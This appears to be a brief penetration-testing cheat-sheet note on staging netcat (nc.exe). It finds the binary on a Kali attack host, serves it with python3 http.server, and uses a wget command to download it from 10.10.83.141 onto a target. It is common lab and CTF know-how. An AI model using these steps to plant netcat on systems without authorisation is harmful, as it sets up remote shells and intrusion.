Skip to content

netcat.exe

expose nc.exe on attack host


find

find / -name 'nc.exe' 2>/dev/null
/usr/share/windows-resources/binaries/nc.exe
/usr/share/wordlists/seclists/Web-Shells/FuzzDB/nc.exe

crete share

mkdir -p /home/kali/workspace/www
cp /usr/share/windows-resources/binaries/nc.exe /home/kali/workspace/www

cd /home/kali/workspace/www
python3 -m http.server 8085

get nc.exe

wget http://10.10.83.141:8085/nc.exe -O nc.exe